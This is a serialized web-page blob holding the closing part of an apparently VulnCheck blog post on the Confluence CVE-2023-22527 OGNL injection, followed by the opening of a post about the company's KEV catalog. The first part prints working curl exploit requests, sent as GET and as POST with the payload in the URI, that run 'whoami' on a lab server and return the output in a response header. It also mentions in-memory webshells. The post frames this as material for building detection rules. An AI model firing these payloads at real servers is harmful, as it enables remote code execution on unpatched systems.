left intact\n",[886,76010,76011,76034,76050,76064,76071,76078,76091,76113,76120,76126,76138,76142,76149,76156,76163,76170,76187,76194,76201,76215,76222,76248,76260,76267,76284,76291,76298,76305,76309,76324],{"__ignoreMap":219},[1373,76012,76013,76015,76017,76020,76023,76025,76028,76031],{"class":1375,"line":1376},[1373,76014,55482],{"class":2206},[1373,76016,2222],{"class":1391},[1373,76018,76019],{"class":2209}," -kvs",[1373,76021,76022],{"class":2209}," -G",[1373,76024,39692],{"class":2209},[1373,76026,76027],{"class":1391}," \u002Fdev\u002Fnull",[1373,76029,76030],{"class":1391}," http:\u002F\u002F10.9.49.76:8090\u002Ftemplate\u002Faui\u002Ftext-inline.vm",[1373,76032,76033],{"class":2326}," \\\n",[1373,76035,76036,76038,76041,76043,76046,76048],{"class":1375,"line":220},[1373,76037,69588],{"class":4640},[1373,76039,76040],{"class":2209},"--data-urlencode",[1373,76042,4713],{"class":1387},[1373,76044,76045],{"class":1391},"label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.p1,{})+\\u0027",[1373,76047,1388],{"class":1387},[1373,76049,76033],{"class":2326},[1373,76051,76052,76054,76056,76058,76061],{"class":1375,"line":1266},[1373,76053,69588],{"class":4640},[1373,76055,76040],{"class":2209},[1373,76057,4713],{"class":1387},[1373,76059,76060],{"class":1391},"p1=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\"Cmd-Ret\",(new freemarker.template.utility.Execute()).exec({\"whoami\"}))",[1373,76062,76063],{"class":1387},"'\n",[1373,76065,76066,76068],{"class":1375,"line":1852},[1373,76067,35613],{"class":1397},[1373,76069,76070],{"class":4640},"   Trying 10.9.49.76:8090...\n",[1373,76072,76073,76075],{"class":1375,"line":4692},[1373,76074,35613],{"class":1397},[1373,76076,76077],{"class":4640}," TCP_NODELAY set\n",[1373,76079,76080,76082,76085,76088],{"class":1375,"line":4724},[1373,76081,35613],{"class":1397},[1373,76083,76084],{"class":4640}," Connected to 10.9.49.76 
(",[1373,76086,76087],{"class":2206},"10.9.49.76",[1373,76089,76090],{"class":4640},") port 8090 (#0)\n",[1373,76092,76093,76095,76098,76101,76103,76106,76108,76111],{"class":1375,"line":4756},[1373,76094,5384],{"class":1397},[1373,76096,76097],{"class":2206}," GET",[1373,76099,76100],{"class":1391}," \u002Ftemplate\u002Faui\u002Ftext-inline.vm?label=%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.p1%2C%7B%7D%29%2B%5Cu0027",[1373,76102,7218],{"class":1383},[1373,76104,76105],{"class":4640},"p1",[1373,76107,5417],{"class":1397},[1373,76109,76110],{"class":1391},"%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%22Cmd-Ret%22%2C%28new%20freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29",[1373,76112,35589],{"class":2206},[1373,76114,76115,76117],{"class":1375,"line":4768},[1373,76116,5384],{"class":1397},[1373,76118,76119],{"class":4640}," Host: 10.9.49.76:8090\n",[1373,76121,76122,76124],{"class":1375,"line":4792},[1373,76123,5384],{"class":1397},[1373,76125,35603],{"class":4640},[1373,76127,76128,76130,76132,76134,76136],{"class":1375,"line":4798},[1373,76129,5384],{"class":1397},[1373,76131,35610],{"class":4640},[1373,76133,35613],{"class":1397},[1373,76135,2180],{"class":4640},[1373,76137,35618],{"class":1397},[1373,76139,76140],{"class":1375,"line":4806},[1373,76141,6765],{"class":1397},[1373,76143,76144,76146],{"class":1375,"line":4817},[1373,76145,35613],{"class":1397},[1373,76147,76148],{"class":4640}," Mark bundle as not supporting multiuse\n",[1373,76150,76151,76153],{"class":1375,"line":4825},[1373,76152,11852],{"class":1397},[1373,76154,76155],{"class":4640}," HTTP\u002F1.1 200\n",[1373,76157,76158,76160],{"class":1375,"line":4835},[1373,76159,11852],{"class":1397},[1373,76161,76162],{"class":4640}," Cache-Control: 
no-store\n",[1373,76164,76165,76167],{"class":1375,"line":4843},[1373,76166,11852],{"class":1397},[1373,76168,76169],{"class":4640}," Expires: Thu, 01 Jan 1970 00:00:00 GMT\n",[1373,76171,76172,76174,76177,76179,76182,76184],{"class":1375,"line":4849},[1373,76173,11852],{"class":1397},[1373,76175,76176],{"class":4640}," X-XSS-Protection: 1",[1373,76178,39663],{"class":1383},[1373,76180,76181],{"class":4640}," mode",[1373,76183,5417],{"class":1397},[1373,76185,76186],{"class":1391},"block\n",[1373,76188,76189,76191],{"class":1375,"line":4877},[1373,76190,11852],{"class":1397},[1373,76192,76193],{"class":4640}," X-Content-Type-Options: nosniff\n",[1373,76195,76196,76198],{"class":1375,"line":4915},[1373,76197,11852],{"class":1397},[1373,76199,76200],{"class":4640}," X-Frame-Options: SAMEORIGIN\n",[1373,76202,76203,76205,76208,76210,76213],{"class":1375,"line":4931},[1373,76204,11852],{"class":1397},[1373,76206,76207],{"class":4640}," Content-Security-Policy: frame-ancestors ",[1373,76209,1388],{"class":1387},[1373,76211,76212],{"class":1391},"self",[1373,76214,76063],{"class":1387},[1373,76216,76217,76219],{"class":1375,"line":4947},[1373,76218,11852],{"class":1397},[1373,76220,76221],{"class":4640}," X-Confluence-Request-Time: 1709669510258\n",[1373,76223,76224,76226,76229,76231,76234,76236,76239,76241,76243,76245],{"class":1375,"line":4952},[1373,76225,11852],{"class":1397},[1373,76227,76228],{"class":4640}," Set-Cookie: JSESSIONID",[1373,76230,5417],{"class":1397},[1373,76232,76233],{"class":1391},"4CABC119C5C70CC2C745D4107663F45C",[1373,76235,39663],{"class":1383},[1373,76237,76238],{"class":4640}," Path",[1373,76240,5417],{"class":1397},[1373,76242,2180],{"class":1391},[1373,76244,39663],{"class":1383},[1373,76246,76247],{"class":2206}," HttpOnly\n",[1373,76249,76250,76252,76255,76257],{"class":1375,"line":6776},[1373,76251,11852],{"class":1397},[1373,76253,76254],{"class":4640}," Cmd-Ret: nt 
authority",[1373,76256,8943],{"class":2326},[1373,76258,76259],{"class":4640},"etwork service  \n",[1373,76261,76262,76264],{"class":1375,"line":6781},[1373,76263,11852],{"class":1397},[1373,76265,76266],{"class":4640}," X-Accel-Buffering: no\n",[1373,76268,76269,76271,76274,76276,76279,76281],{"class":1375,"line":7524},[1373,76270,11852],{"class":1397},[1373,76272,76273],{"class":4640}," Content-Type: text\u002Fhtml",[1373,76275,39663],{"class":1383},[1373,76277,76278],{"class":4640},"charset",[1373,76280,5417],{"class":1397},[1373,76282,76283],{"class":1391},"UTF-8\n",[1373,76285,76286,76288],{"class":1375,"line":7530},[1373,76287,11852],{"class":1397},[1373,76289,76290],{"class":4640}," Content-Language: en-US\n",[1373,76292,76293,76295],{"class":1375,"line":7546},[1373,76294,11852],{"class":1397},[1373,76296,76297],{"class":4640}," Transfer-Encoding: chunked\n",[1373,76299,76300,76302],{"class":1375,"line":7571},[1373,76301,11852],{"class":1397},[1373,76303,76304],{"class":4640}," Date: Tue, 05 Mar 2024 20:11:50 GMT\n",[1373,76306,76307],{"class":1375,"line":7598},[1373,76308,35662],{"class":1397},[1373,76310,76311,76313,76316,76319,76322],{"class":1375,"line":7615},[1373,76312,9149],{"class":1383},[1373,76314,76315],{"class":1383}," [",[1373,76317,76318],{"class":5467},"7656",[1373,76320,76321],{"class":4640}," bytes data",[1373,76323,7103],{"class":1383},[1373,76325,76326,76328,76331],{"class":1375,"line":7635},[1373,76327,35613],{"class":1397},[1373,76329,76330],{"class":4640}," Connection ",[1373,76332,76333],{"class":4630},"#0 to host 10.9.49.76 left intact\n",[18,76335,76336],{},"And it can be thrown with the parameters in the POST URI:",[1354,76338,76340],{"className":31740,"code":76339,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -kvs -X POST -G -o \u002Fdev\u002Fnull http:\u002F\u002F10.9.49.76:8090\u002Ftemplate\u002Faui\u002Ftext-inline.vm \\\n> --data-urlencode 
'label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.p1,{})+\\u0027' \\\n> --data-urlencode 'p1=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\"Cmd-Ret\",(new freemarker.template.utility.Execute()).exec({\"whoami\"}))'\n*   Trying 10.9.49.76:8090...\n* TCP_NODELAY set\n* Connected to 10.9.49.76 (10.9.49.76) port 8090 (#0)\n> POST \u002Ftemplate\u002Faui\u002Ftext-inline.vm?label=%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.p1%2C%7B%7D%29%2B%5Cu0027&p1=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%22Cmd-Ret%22%2C%28new%20freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29 HTTP\u002F1.1\n> Host: 10.9.49.76:8090\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n>\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200\n\u003C Cache-Control: no-store\n\u003C Expires: Thu, 01 Jan 1970 00:00:00 GMT\n\u003C X-XSS-Protection: 1; mode=block\n\u003C X-Content-Type-Options: nosniff\n\u003C X-Frame-Options: SAMEORIGIN\n\u003C Content-Security-Policy: frame-ancestors 'self'\n\u003C X-Confluence-Request-Time: 1709669588783\n\u003C Set-Cookie: JSESSIONID=B96DB876DCA328DEDC0073326B666805; Path=\u002F; HttpOnly\n\u003C Cmd-Ret: nt authority\\network service  \n\u003C X-Accel-Buffering: no\n\u003C Content-Type: text\u002Fhtml;charset=UTF-8\n\u003C Content-Language: en-US\n\u003C Transfer-Encoding: chunked\n\u003C Date: Tue, 05 Mar 2024 20:13:09 GMT\n\u003C\n{ [7656 bytes data]\n* Connection #0 to host 10.9.49.76 left 
intact\n",[886,76341,76342,76366,76380,76392,76398,76404,76414,76432,76438,76444,76456,76460,76466,76472,76478,76484,76498,76504,76510,76522,76529,76552,76562,76568,76582,76588,76594,76601,76605,76617],{"__ignoreMap":219},[1373,76343,76344,76346,76348,76350,76353,76356,76358,76360,76362,76364],{"class":1375,"line":1376},[1373,76345,55482],{"class":2206},[1373,76347,2222],{"class":1391},[1373,76349,76019],{"class":2209},[1373,76351,76352],{"class":2209}," -X",[1373,76354,76355],{"class":1391}," POST",[1373,76357,76022],{"class":2209},[1373,76359,39692],{"class":2209},[1373,76361,76027],{"class":1391},[1373,76363,76030],{"class":1391},[1373,76365,76033],{"class":2326},[1373,76367,76368,76370,76372,76374,76376,76378],{"class":1375,"line":220},[1373,76369,69588],{"class":4640},[1373,76371,76040],{"class":2209},[1373,76373,4713],{"class":1387},[1373,76375,76045],{"class":1391},[1373,76377,1388],{"class":1387},[1373,76379,76033],{"class":2326},[1373,76381,76382,76384,76386,76388,76390],{"class":1375,"line":1266},[1373,76383,69588],{"class":4640},[1373,76385,76040],{"class":2209},[1373,76387,4713],{"class":1387},[1373,76389,76060],{"class":1391},[1373,76391,76063],{"class":1387},[1373,76393,76394,76396],{"class":1375,"line":1852},[1373,76395,35613],{"class":1397},[1373,76397,76070],{"class":4640},[1373,76399,76400,76402],{"class":1375,"line":4692},[1373,76401,35613],{"class":1397},[1373,76403,76077],{"class":4640},[1373,76405,76406,76408,76410,76412],{"class":1375,"line":4724},[1373,76407,35613],{"class":1397},[1373,76409,76084],{"class":4640},[1373,76411,76087],{"class":2206},[1373,76413,76090],{"class":4640},[1373,76415,76416,76418,76420,76422,76424,76426,76428,76430],{"class":1375,"line":4756},[1373,76417,5384],{"class":1397},[1373,76419,76355],{"class":2206},[1373,76421,76100],{"class":1391},[1373,76423,7218],{"class":1383},[1373,76425,76105],{"class":4640},[1373,76427,5417],{"class":1397},[1373,76429,76110],{"class":1391},[1373,76431,35589],{"class":2206},[1373,76433,
76434,76436],{"class":1375,"line":4768},[1373,76435,5384],{"class":1397},[1373,76437,76119],{"class":4640},[1373,76439,76440,76442],{"class":1375,"line":4792},[1373,76441,5384],{"class":1397},[1373,76443,35603],{"class":4640},[1373,76445,76446,76448,76450,76452,76454],{"class":1375,"line":4798},[1373,76447,5384],{"class":1397},[1373,76449,35610],{"class":4640},[1373,76451,35613],{"class":1397},[1373,76453,2180],{"class":4640},[1373,76455,35618],{"class":1397},[1373,76457,76458],{"class":1375,"line":4806},[1373,76459,6765],{"class":1397},[1373,76461,76462,76464],{"class":1375,"line":4817},[1373,76463,35613],{"class":1397},[1373,76465,76148],{"class":4640},[1373,76467,76468,76470],{"class":1375,"line":4825},[1373,76469,11852],{"class":1397},[1373,76471,76155],{"class":4640},[1373,76473,76474,76476],{"class":1375,"line":4835},[1373,76475,11852],{"class":1397},[1373,76477,76162],{"class":4640},[1373,76479,76480,76482],{"class":1375,"line":4843},[1373,76481,11852],{"class":1397},[1373,76483,76169],{"class":4640},[1373,76485,76486,76488,76490,76492,76494,76496],{"class":1375,"line":4849},[1373,76487,11852],{"class":1397},[1373,76489,76176],{"class":4640},[1373,76491,39663],{"class":1383},[1373,76493,76181],{"class":4640},[1373,76495,5417],{"class":1397},[1373,76497,76186],{"class":1391},[1373,76499,76500,76502],{"class":1375,"line":4877},[1373,76501,11852],{"class":1397},[1373,76503,76193],{"class":4640},[1373,76505,76506,76508],{"class":1375,"line":4915},[1373,76507,11852],{"class":1397},[1373,76509,76200],{"class":4640},[1373,76511,76512,76514,76516,76518,76520],{"class":1375,"line":4931},[1373,76513,11852],{"class":1397},[1373,76515,76207],{"class":4640},[1373,76517,1388],{"class":1387},[1373,76519,76212],{"class":1391},[1373,76521,76063],{"class":1387},[1373,76523,76524,76526],{"class":1375,"line":4947},[1373,76525,11852],{"class":1397},[1373,76527,76528],{"class":4640}," X-Confluence-Request-Time: 
1709669588783\n",[1373,76530,76531,76533,76535,76537,76540,76542,76544,76546,76548,76550],{"class":1375,"line":4952},[1373,76532,11852],{"class":1397},[1373,76534,76228],{"class":4640},[1373,76536,5417],{"class":1397},[1373,76538,76539],{"class":1391},"B96DB876DCA328DEDC0073326B666805",[1373,76541,39663],{"class":1383},[1373,76543,76238],{"class":4640},[1373,76545,5417],{"class":1397},[1373,76547,2180],{"class":1391},[1373,76549,39663],{"class":1383},[1373,76551,76247],{"class":2206},[1373,76553,76554,76556,76558,76560],{"class":1375,"line":6776},[1373,76555,11852],{"class":1397},[1373,76557,76254],{"class":4640},[1373,76559,8943],{"class":2326},[1373,76561,76259],{"class":4640},[1373,76563,76564,76566],{"class":1375,"line":6781},[1373,76565,11852],{"class":1397},[1373,76567,76266],{"class":4640},[1373,76569,76570,76572,76574,76576,76578,76580],{"class":1375,"line":7524},[1373,76571,11852],{"class":1397},[1373,76573,76273],{"class":4640},[1373,76575,39663],{"class":1383},[1373,76577,76278],{"class":4640},[1373,76579,5417],{"class":1397},[1373,76581,76283],{"class":1391},[1373,76583,76584,76586],{"class":1375,"line":7530},[1373,76585,11852],{"class":1397},[1373,76587,76290],{"class":4640},[1373,76589,76590,76592],{"class":1375,"line":7546},[1373,76591,11852],{"class":1397},[1373,76593,76297],{"class":4640},[1373,76595,76596,76598],{"class":1375,"line":7571},[1373,76597,11852],{"class":1397},[1373,76599,76600],{"class":4640}," Date: Tue, 05 Mar 2024 20:13:09 GMT\n",[1373,76602,76603],{"class":1375,"line":7598},[1373,76604,35662],{"class":1397},[1373,76606,76607,76609,76611,76613,76615],{"class":1375,"line":7615},[1373,76608,9149],{"class":1383},[1373,76610,76315],{"class":1383},[1373,76612,76318],{"class":5467},[1373,76614,76321],{"class":4640},[1373,76616,7103],{"class":1383},[1373,76618,76619,76621,76623],{"class":1375,"line":7635},[1373,76620,35613],{"class":1397},[1373,76622,76330],{"class":4640},[1373,76624,76333],{"class":4630},[18,76626,76627],{},"All of which 
has to be accounted for in the ruleset.",[61,76629,1903],{"id":1902},[18,76631,76632,76633,76635,76636,76638,76639,76644,76645,76650],{},"There's more than one way to reach Rome. While using ",[886,76634,74225],{}," appears to be the popular way of exploiting CVE-2023-22527, other more stealthy paths generate different indicators. Of particular interest is the in-memory webshell, which had a pre-existing variant ",[1131,76637,36132],{}," we published this blog, and that variant appears to have been deployed ",[47,76640,76643],{"href":76641,"rel":76642},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=%22X-Cmd-Result%22+%22X-Confluence-Request-Time%22",[51],"in the wild",". Defenders and attackers alike should consider ",[47,76646,76649],{"href":76647,"rel":76648},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2023-22527\u002Ftree\u002Fmain",[51],"these variants"," (and how they apply to other OGNL attacks).",[61,76652,202],{"id":201},[18,76654,76655,76656,982,76659],{},"The VulnCheck Initial Access team is always looking to advance the state of attack on initial access vulnerabilities like CVE-2023-22527. 
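Returning to the detection section above: the three delivery shapes (parameters in the POST body, parameters in the POST URI, and a plain GET) can be replayed through one detection function to see why a body-only rule leaves two of them uncovered. The block below is an added example written for this page, not VulnCheck's code or rules. The sample requests are constructed here from the percent-encoded query string in the curl transcripts, the `10.9.49.76:8090` host is copied from them, and `STRICT_RE` is an assumed tightening of the published pcre, not something the post proposes.

```python
"""Run the three CVE-2023-22527 request shapes through one detection function.

Added example (not VulnCheck's code). Sample requests are constructed from the
query string shown in the curl transcripts above; they are not captured traffic.
"""
import re
from urllib.parse import urlsplit

TARGET_PATH = "/template/aui/text-inline.vm"

# Same expression as the pcre in the Suricata rules above (case-insensitive).
# The alternation is top level: the right-hand branch matches "0027", raw or
# percent-encoded, anywhere in the buffer, with no dependency on "label=".
RULE_RE = re.compile(r"label=[^&]*(\\|%5c)(u|%75)|(0|%30)(0|%30)(2|%32)(7|%37)", re.I)

# Tightened variant (assumption about the rule's intent, not from the post):
# the full "\u0027" sequence must appear inside the label value itself.
STRICT_RE = re.compile(r"label=[^&]*(\\|%5c)(u|%75)(0|%30)(0|%30)(2|%32)(7|%37)", re.I)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.decode("latin-1")


def match_cve_2023_22527(raw: bytes, pattern=RULE_RE, body_only=False):
    """Return the rule variant that fires ("POST Body", "POST URI", "GET URI") or None.

    body_only=True mimics a ruleset that only inspects the POST body.
    """
    method, target, _headers, body = parse_request(raw)
    parts = urlsplit(target)
    if not parts.path.startswith(TARGET_PATH):
        return None
    if method == "POST" and "label=" in body and pattern.search(body):
        return "POST Body"
    if body_only:
        return None
    if method in ("GET", "POST") and "label=" in parts.query and pattern.search(parts.query):
        return f"{method} URI"
    return None


# Query string from the curl transcripts above (already percent-encoded by curl).
EXPLOIT_QS = (
    "label=%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29"
    ".internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.p1%2C%7B%7D%29%2B%5Cu0027"
    "&p1=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%22Cmd-Ret%22"
    "%2C%28new%20freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29"
)


def build_request(method: str, target: str, body: str = "") -> bytes:
    """Assemble a minimal raw request (constructed sample, host copied from the transcripts)."""
    lines = [f"{method} {target} HTTP/1.1", "Host: 10.9.49.76:8090"]
    if body:
        lines += ["Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {len(body)}"]
    return ("\r\n".join(lines) + "\r\n\r\n" + body).encode("latin-1")


SAMPLES = {
    "get_uri": build_request("GET", f"{TARGET_PATH}?{EXPLOIT_QS}"),
    "post_uri": build_request("POST", f"{TARGET_PATH}?{EXPLOIT_QS}"),
    "post_body": build_request("POST", TARGET_PATH, EXPLOIT_QS),
    "benign_label": build_request("GET", f"{TARGET_PATH}?label=hello%20world"),
    "benign_0027": build_request("GET", f"{TARGET_PATH}?label=ticket-0027&p1=x"),
    "other_path": build_request("POST", "/login.action", "os_username=admin&os_password=x"),
}


def run_all(pattern=RULE_RE, body_only=False):
    """Evaluate every sample; returns {sample_name: variant_or_None}."""
    return {name: match_cve_2023_22527(raw, pattern, body_only) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for label, kwargs in [("page rules", {}), ("body-only ruleset", {"body_only": True}),
                          ("strict label pattern", {"pattern": STRICT_RE})]:
        print(label)
        for name, verdict in run_all(**kwargs).items():
            print(f"  {name:14s} -> {verdict}")
```

With the page's pattern all three exploit shapes fire and the body-only run misses the GET and POST-URI variants, which is the point of carrying three rules. One caveat on the published pcre: its `|` is top level, so `label=...\u` and `0027` are independent alternatives, and the second fires on `0027` in any position, raw or percent-encoded (the `benign_0027` sample). The tightened pattern does not, at the cost of missing a payload that splits or re-encodes the escape differently; which trade-off is right depends on how much legitimate traffic a site sends to `text-inline.vm`.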
For more research like this, see our blogs, ",[47,76657,40447],{"href":53829,"rel":76658},[51],[47,76660,35931],{"href":53837,"rel":76661},[51],[18,76663,53846,76664,53850,76667,982,76670,1260],{},[47,76665,1233],{"href":2871,"rel":76666},[51],[47,76668,1245],{"href":45535,"rel":76669},[51],[47,76671,216],{"href":214,"rel":76672},[51],[2901,76674,76675],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: 
var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sTNss, html code.shiki .sTNss{--shiki-light:#9C3EDA;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .syw9h, html code.shiki .syw9h{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#24292E;--shiki-default-font-style:inherit;--shiki-dark:#E1E4E8;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sRxSC, 
html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sSBr1, html code.shiki .sSBr1{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sKvfc, html code.shiki 
.sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}",{"title":219,"searchDepth":220,"depth":220,"links":76677},[76678,76679,76684,76685,76686],{"id":11647,"depth":220,"text":11648},{"id":74232,"depth":220,"text":74233,"children":76680},[76681,76682,76683],{"id":74303,"depth":1266,"text":74304},{"id":74739,"depth":1266,"text":74740},{"id":75694,"depth":1266,"text":75695},{"id":75976,"depth":220,"text":75977},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"Examining memory resident payloads landed with CVE-2023-22527.",{"slug":76689},"confluence-dreams-of-shells","\u002Fblog\u002Fconfluence-dreams-of-shells",{"title":22211,"description":76687},"blog\u002Fconfluence-dreams-of-shells","aT5YgvpG5ZfRmQxxkCWpxHseoOg3cKPtAD8UW0gAX7c",{"id":76695,"title":76696,"articles":76697,"authors":76698,"body":76700,"date":78339,"description":78340,"extension":234,"image":7,"link":7,"meta":78341,"navigation":237,"path":78343,"seo":78344,"series":7,"stem":78345,"subtype":7,"tags":78346,"__hash__":78347},"blog\u002Fblog\u002Fthe-anatomy-of-an-exploited-cve.md","Exploring the Anatomy of an Exploited CVE with VulnCheck KEV",[],[76699],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":76701,"toc":78331},[76702,76708,76712,76715,76718,76722,76728,76731,76742,76745,76825,76829,76832,76855,76858,77269,77273,77276,77279,78300,78304,78307,78311,78314,78321,78323,78328],[18,76703,76704],{},[68,76705],{":width":10862,"alt":76706,"src":76707},"The-Anatomy-of-an-Exploited-CVE","\u002Fblog\u002Fthe-anatomy-of-an-exploited-cve\u002FExploitation-Timeline-Atlassian.png",[61,76709,76711],{"id":76710},"welcome-to-the-vulncheck-kev-catalog","Welcome to the VulnCheck KEV Catalog",[18,76713,76714],{},"VulnCheck now offers access to a new Community resource, the VulnCheck 
Known Exploited Vulnerabilities (KEV) catalog. The free offering, available by joining the VulnCheck Community, provides advanced intelligence on vulnerabilities that have been exploited in the wild. VulnCheck’s KEV catalog provides organizations with earlier and broader visibility into known exploitation, along with publicly available references indicating where and when exploitation was reported from credible sources.",[18,76716,76717],{},"The VulnCheck KEV catalog can be accessed through our Community Edition via the VulnCheck KEV dashboard, machine-readable JSON, and the VulnCheck KEV API endpoint. To illustrate the value of the VulnCheck KEV, let's examine the exploitation timeline for a recent vulnerability.",[61,76719,76721],{"id":76720},"exploring-exploitation-of-atlassian-confluence-cve-2023-22527","Exploring Exploitation of Atlassian Confluence CVE-2023-22527",[18,76723,76724,76725],{},"For this demonstration, we'll use CVE-2023-22527, an Atlassian Confluence Server vulnerability added to CISA KEV on January 24th, 2024. 
